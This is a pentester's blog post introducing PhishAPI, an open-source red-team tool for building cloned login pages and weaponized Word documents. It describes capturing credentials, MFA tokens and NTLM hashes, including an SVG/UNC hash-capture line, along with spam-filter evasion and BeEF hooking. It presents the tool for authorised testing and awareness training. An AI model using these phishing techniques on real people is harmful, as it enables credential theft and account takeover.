PhishAPI Tool — Rapid Deployment of Fake Sites and Maldocs with Notifications

Intro / TL;DR

12 min readMay 10, 2019

Hey InfoSec Community! As the pentester, I got tired of setting up and tearing down environments each time I or one of my team members wanted to start a new phishing campaign. This accounted for a good portion of the time allocated for our engagement. Sure, we saved local templates and code, but it was still time consuming to modify the cloned HTML, host it in two places, and set up a back-end service to capture, store, and display the credentials. What started as a simple PHP API which accepted a username and password and posted directly to slack, evolved into a full web based Phishing service out of a desire to improve efficiency internally.

I developed this on my own time and wanted to give back and share with the community so I decided to open-source it for everyone. The idea is that other security teams can adopt this as a platform, companies can use this for internal security awareness training, self learning for those interested in InfoSec, or even as honeypot bait (think Canary). Using this service ourselves, we’ve gained a ton of efficiency and can be using our time better to perform more recon or develop new campaigns instead of prepping. You can literally be up and running with a cloned site or maldoc within minutes, ready to be notified of any “victims”. It can be quite comical to watch them start pouring in, so I added some flair for fun. 😄

Check out the free service (w/ Slack demo) at https://phishapi.com or clone it to host yourself at https://github.com/curtbraz/Phishing-API.

Current Functionality

Fake Sites
Templates — Auto-Generated HTML Landing Pages
Support for Custom HTML
Malicious Documents
New Word Documents
Weaponizing Existing Word Documents
Payloads
Hosted vs Downloaded
Email Campaign Templates
Credential Capturing
Real-time Alerting
Database for Reporting
Hash Capturing
BeEF Hooking
Trophies

The API is written as a server-side script so that it performs as both a client and server for the user. There’s nothing to install locally, it’s all accessible via a web browser. The service should be publicly accessible so that “victims” can reach it and should be set up with an SSL certificate. See LetsEncrypt for a free one. Simply clone the GitHub repository to a web service, set the config.php variables, and start phishing!

Note: The API rarely gets flagged as a blacklisted site by “victims” because it’s usually not seen. The API receives the HTTP POST request and redirects the user immediately to the supplied location.

When ready, head to your new domain and you’ll be presented with two options:

**Main Page — Choose “Fake Portal”, “Weaponized Documents”, or “Email Campaigns”**

Fake Sites

One of main features of the PhishAPI is credential, MFA token, and hash capturing via a cloned or fake login portal. You can either create your own HTML page from scratch, use a cloning tool such as HTTrack, or select one of the pre-defined templates to have your HTML auto-generated for you directly from the API!

Creating HTML or Editing From Another Source

If you’re creating your own landing page or cloning one manually, you can still leverage the benefits of the PhishAPI. Simply make sure the “username”, “password”, and optionally, “token” fields are set. For fun, Slack options can be included as hidden input fields. See the screenshot below or the GitHub repository for more information.

Auto-Generated HTML Templates

PhishAPI supports generating templates for you that can be stored on an external server. They automatically are configured with input you provide to dynamically support the API. Options for MFA, the server address, custom logos, custom title tags, Slack bot names and emojis, and required fields are supported. Simply select “Fake Sites” from the main page and choose one of the following templates:

After selecting a template, complete the following form to have the HTML generated automatically for you:

The “API URL” is simply the API Domain you want the HTML form POSTing to. The value should already be set for you.

“Project Name” is the name of the engagement, if this is for a Phishing project. An organization name or campaign title is typically what you’d set here. If left blank, it will be logged as “Undefined Project”.

“Redirect URL” is the path you want the “victim” taken to after they submit their credentials. To avoid suspicion, set a location that wouldn’t be as likely to tip them off. I’m a fan of redirecting them to the real location they already have a session open with so they’re simply logged in. If you chose a location that supports iframes, persistence will be established for BeEF hooking by placing the redirect location in a full body iframe. Otherwise, it’s a simple 302 Redirect.

“Slack Bot Name” and “Slack Bot Logo” are pretty self-explanatory. Set these if you don’t want to use the default name and emoji for the Slack notifications.

“Website Logo URL” can be set as an image URL. This field is optional and if set, will add or change the default template image with the one specified. This can be useful to make a generic login page look like it’s branded for the targeted individual or organization. You should use HTTPS if your landing page is going to be hosted over HTTPS to avoid mixed content warnings. This field doesn’t always work for sites that are already branded, such as Facebook.

“Website Title” is similar to the URL above. It sets the <TITLE> and main Header tag if supplied, or otherwise defaults to “Secure Login Portal”.

“MFA Token” options dynamically allow for setting an additional third “Token” input field in case the organization you’re targeting uses multi-factor tokens. If the “Require” field is also checked, HTML5 enforces the field to be completed before the “victim” can submit the login form.

Submitting the API form here takes you to a download page, where you can now instantly retrieve your ready-to-use phishing source code as an archive. Simply upload this to your web service and start having your “victims” go there! Any of the HTML can be modified manually once downloaded to suit your needs.

**Auto-Generated HTML Landing Page Based on Options Set**

**Spoofed Google Login Site with Required MFA Field**

Malicious Documents

In addition to fake login portals, PhishAPI also supports the auto-generation of malicious documents (maldocs). Currently, only Microsoft Word documents are supported, but plans to support other formats will be coming soon. Simply head over to “Weaponized Documents” from the main page to begin!

**Options for Creating a Weaponized Document**

“API URL” fields should be set for the Word document to call back to. This should be the domain of your API, which should already be set for you. Select HTTP or HTTPS.

“Target” should be the name of the individual who will be the recipient of the email. You can leave this blank if you provide an Organization.

“Organization” is simply the name of the company or organization you’re targeting. This helps keep track of multiple projects in case campaigns are happening in parallel. You can leave this blank if you provide a Target.

“Payloads” are options to determine what it is you want the Word document to do once opened. More detail on this below. “HTTP Call” and “SMB Hash” are defaults and cannot be unchecked.

“Slack Settings” are not required if set in your config.php file. They tell the API what Slack channel the specific document should call back to and which Slack Incoming Webhook token to use in order to leverage the Slack API.

New Word Documents

To quickly generate a Word Document from scratch to start sending to Phishing victims, click “Generate Payload” without uploading an existing document. A default template is created for you, which is designed to attempt to fool the “victim” into enabling editing to trigger the payload(s) selected.

Weaponizing Existing Word Documents

To embed an existing Word document with the selected payloads, simply upload an existing docx file before clicking “Generate Payload”. The API will receive the doc, inject the payloads into it, and allow you to re-download it for use in your phishing campaign.

Payloads

The fun part! Select between the following:

HTTP Call

This option (included by default) will embed the document with a 0 x 0 pixel which calls back to the API with a unique identifier which was created when you first generated your document. This “UUID” is used to look up your Slack settings from the database and notify you that the document was opened by the target. The UUID is used so that personal Slack settings aren’t available to the recipient of the document. The “victim” does not notice anything upon opening the document. “Protected View” must be enabled in legacy versions of Word for this to work, but is often enabled by default. The auto-generated version is created to trick the user into enabling this to view the rest of the content in the document. Office 365 web view does NOT require clicking anything, as it just works when opened!

SMB Hash

This option (included by default) will also embed a UNC path in addition to the HTTP call in another 0 x 0 pixel. The document will attempt to connect over SMB to the API server. If Responder is configured in a Screen session on API server and “phishinghashes.sh” is scheduled in a Cron job, hashes may be captured and sent to the Slack channel. Note: For this to work, the victim’s ISP and outbound egress ACL’s must allow TCP 445. Your API server must also allow incoming TCP 445. The “victim” does not notice anything upon opening the document.

Auth Prompt

This optional field, if checked, will perform the same service Phishery does. (Thanks for the idea, Ryan Hanson!) For those of you unfamiliar, a basic authentication request will be made from the “victim”, prompting for credentials. If typed in, the API captures the input, updates the database tables, and alerts via Slack.

**If “Auth Prompt” is Checked, the “Victim” Sees This Upon Opening the Document**

Hosted vs Downloaded

Once generated, the Word document can either be downloaded to be sent as an attachment in an email, uploaded to a NAS, or whatever else you’d like to do with the actual file. However, sometimes sending weaponized documents as attachments can be flagged by spam filters and antivirus. To avoid this, the PhishAPI also allows hosting your document so it can be called from a hyperlink. Using a new technique I discovered while playing with URI Schemes (another blog maybe?), a MS Word hyperlink is created with HTML markup to be used in the body of an email. Once clicked in Windows, the default browser will prompt to open the remote file without the need to download and open manually. This is useful in campaigns where you’re “sharing a file” with someone, such as a spoofed Office 365 or DocuSign email. The URL itself can be hyperlinked, however, if you’d still like that option.

Email Campaign Templates

The third feature of PhishAPI allows you to select from an archive of email templates you can use to draft your email campaign. You can add your own using a simple WYSIWYG editor via the web interface, or edit an existing one. Variables allow you to add field variables (think MS Word templates) so you can be up in running with a campaign in minutes!

**Predefined Variables and Embed Notification Tag for Alerting When Email is Opened**

**Optionally Include Just the Notification Code in the Body of Your Own Email**

Credential Capturing

Both the “Fake Site” and “Weaponzied Documents” options allow for credential capturing, as described above in their respective categories. When the PhishAPI receives the captured data, real-time Slack alerts are sent to notify the pentester and the credentials are stored in a MySQL database for retrieval.

Real-time Alerting

This is where Slack comes in! In the future, I plan to support Zapier Templates so that users of the API can choose how they want to be notified. Heck, you can dim your IFTTT lights or blink them red when you catch a phish if you really want! Maybe an SMS would be sufficient..

When a user is hooked via BeEF, a hash is captured, a document is opened, or credentials are captured via either method, Slack bots will notify the specified channel(s). See the screenshots below:

**“Auth Prompt” Weaponized Doc Payload**

**“SMB Hash” Weaponized Doc Payload OR Submitted Credentials from Fake Site**

1x1 Pixel Image for Email Body for Notification Upon Opening

**Captured Credentials from “Fake Site”**

Reporting

All captured information is stored in a MySQL database instance on the API server and is easily retrieved via the API in a web HTML table. Clicking the link on a Slack notification will take you to the specific project, or simply browsing “/reporting” for “Fake Sites” or “/phishingdocs/reporting” for “Weaponized Documents” will allow you to browse all projects.

**Captured IP, Hash, Username, Password, and User Agent**

Hash Capturing

Both the “Weaponized Documents” and “Fake Site” options allow for capturing NTLMv2 hashes by default, if SMB traffic is allowed from the “victim’s” client to the server. The documents embed a UNC path as an invisible image which triggers upon opening and the Fake Site portal API embeds a UNC path via an SVG image tag which works on most browsers.

(<image height=”1" width=”1" xlink:href=”\\YOUR_PHISH_API_DOMAIN/resource.jpg” />)

BeEF Hooking

BeEF hooking is supported for those that want to use advanced browser techniques. Real-time Slack notifications and persistent iframe techniques allow you to respond immediately to your phishing victims and interact with their browser. Simply run BeEF in a background service on your API server and run “beefhook.php” in a Cron job every minute.

Trophies

Trophies are my sick sense of humor. For me, they’ve added a great deal of entertainment to my #Phishing channel. Think of these as “Achievements” or “Gold Star” awards for doing things such as having a terrible password, entering the same credentials three times, having an insane amount of successfully phished creds for a single campaign, disclosing more than one password for a single user, and submitting credentials at least 3 days after everyone else has stopped.

**Animated Gifs When Conditions are Met**

Thanks to Troy Hunt’s HaveIBeenPwned Password API, I was able to score captured passwords to determine how many times it showed up in a breach list or paste site. This information is reflected in the Slack alerts via Trophies and “Fake Site” notifications. A :thumbs_up: or :poop: emoji will be reflected in Slack to score password complexity, even if there’s not a HaveIBeenPwned hit.

Conclusion

I hope you find this API as useful as we have on our team at Pondurance! You’re welcome to fork the GitHub repository and edit to your heart’s content! The “Fake Sites” login portal repository does not contain our own templates we use, but feel free to add your own as you go. The demo at https://phishapi.com is available for all to use, I just ask that you please not abuse the service so everyone can enjoy it! Please also do not use this service or my code for illegal purposes.

Happy Cyber Security Awareness Month!